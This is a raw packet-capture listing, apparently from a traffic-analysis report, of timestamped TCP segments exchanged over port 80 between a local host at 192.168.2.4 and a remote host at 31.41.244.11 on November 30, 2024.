                                                      Nov 30, 2024 18:08:29.704487085 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.704565048 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.704783916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.705614090 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.705662966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.705878973 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.705924988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.706521034 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.706566095 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.706728935 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.706768036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.707627058 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.707667112 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.707916975 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.707958937 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.708534956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.708590984 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.708760977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.708810091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.709661007 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.709708929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.709799051 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.709944963 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.710556030 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.710623980 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.710767984 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.710813999 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.711632013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.711682081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.711883068 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.711963892 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.712587118 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.712627888 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.712783098 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.713596106 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.713648081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.713808060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.713854074 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.714626074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.714667082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.714828014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.714869022 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.715617895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.715679884 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.715833902 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.715883017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.716646910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.716695070 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.716842890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.716891050 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.717689991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.717741966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.717866898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.717924118 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.718765020 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.718816996 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.719002008 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.719069004 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.719800949 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.719851971 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.720032930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.720072031 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.720663071 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.720726967 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.720876932 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.720928907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.721817970 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.721863985 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.722018003 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.722057104 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.722692013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.722740889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.722910881 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.722949982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.723720074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.723920107 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.723963976 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.724704027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.724746943 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.724914074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.724961042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.725800037 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.725843906 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.725991964 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.726036072 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.726880074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.726921082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.727093935 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.727138996 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.727782965 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.727982998 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.728029966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.728807926 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.728853941 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.729031086 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.729073048 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.729852915 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.729898930 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.730915070 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.730935097 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.730945110 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.730958939 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.730972052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.731926918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.732122898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.732166052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.732824087 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.732866049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.733016014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.733058929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.733877897 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.733920097 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.734078884 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.734122992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.734549046 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.734594107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.734766006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.734810114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.735558033 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.735601902 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.735761881 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.736530066 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.736572027 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.736939907 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.736984015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.737524033 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.737565994 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.886125088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.886184931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.886352062 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.886395931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.886866093 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.886912107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.887238979 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.887286901 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.887801886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.887849092 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.887960911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.888005972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.888573885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.888618946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.888766050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.888808012 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.889585018 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.889628887 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.889780045 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.889823914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.890621901 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.890667915 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.890877962 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.890944958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.891623974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.891670942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.891829014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.891872883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.892602921 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.892648935 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.892841101 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.892885923 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.893712044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.893763065 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.893919945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.893964052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.894637108 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.894680977 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.894831896 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.894876957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.895641088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.895689011 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.895845890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.895889997 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.896660089 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.896704912 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.896843910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.896887064 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.897694111 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.897737026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.897851944 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.897896051 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.898683071 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.898858070 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.898881912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.898926020 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.899701118 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.899746895 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.899918079 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.899961948 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.900722027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.900764942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.900913000 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.900988102 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.901855946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.901902914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.902054071 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.902096987 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.902734041 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.902780056 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.902918100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.902964115 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.903723001 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.903765917 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.903934956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.903980017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.904723883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.904767036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.904922962 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.904966116 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.905761957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.905803919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.905982971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.906028032 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.906764030 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.906805038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.906970978 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.907015085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.907767057 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.907813072 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.907962084 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.908005953 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.908759117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.908807039 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.908958912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.909003019 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.909835100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.909876108 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.910043955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.910092115 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.910788059 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.910830975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.910993099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.911031961 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.911833048 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.911878109 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.911999941 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.912043095 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.912832975 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.912878036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.913039923 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.913084030 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.913885117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.913933992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.914086103 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.914133072 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.914868116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.915069103 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.915132999 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.915911913 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.916029930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.916089058 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.916850090 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.916899920 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.917059898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.917108059 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.917866945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.917908907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.918055058 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.918092012 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.918901920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.918948889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.919090033 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.919135094 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.919918060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.919965029 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.920084953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.920129061 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.920907021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.920954943 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.921107054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.921165943 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.921905994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.921952009 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.922102928 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.922149897 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.922925949 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.922969103 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.923121929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.923168898 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.923922062 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.923965931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.924125910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.924170017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.924931049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.924974918 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.925139904 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.925185919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.925952911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.925997019 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.926172972 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.926219940 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.927016973 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.927059889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.927223921 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.927268028 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.927979946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.928025961 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.928157091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.928204060 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.928977013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.929019928 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.929183006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.929225922 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.930003881 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.930059910 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.930316925 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.930361032 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.931063890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.931107998 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.931231976 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.931293964 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.932066917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.932288885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.932331085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.933034897 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.933089972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.933239937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.933283091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.934041023 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.934086084 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.934315920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.934365988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.935072899 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.935240984 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.935267925 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.935282946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.935786963 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.935977936 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.936026096 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.936758041 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.936804056 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.936974049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.937020063 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.937815905 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.937860966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.938018084 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.938062906 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.938776970 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.938817978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.087244034 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:30.087320089 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.087420940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:30.087467909 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.087820053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:30.087867975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.088166952 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:30.088217020 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.088726997 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:30.088773012 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:30.088922977 CET804980531.41.244.11192.168.2.4
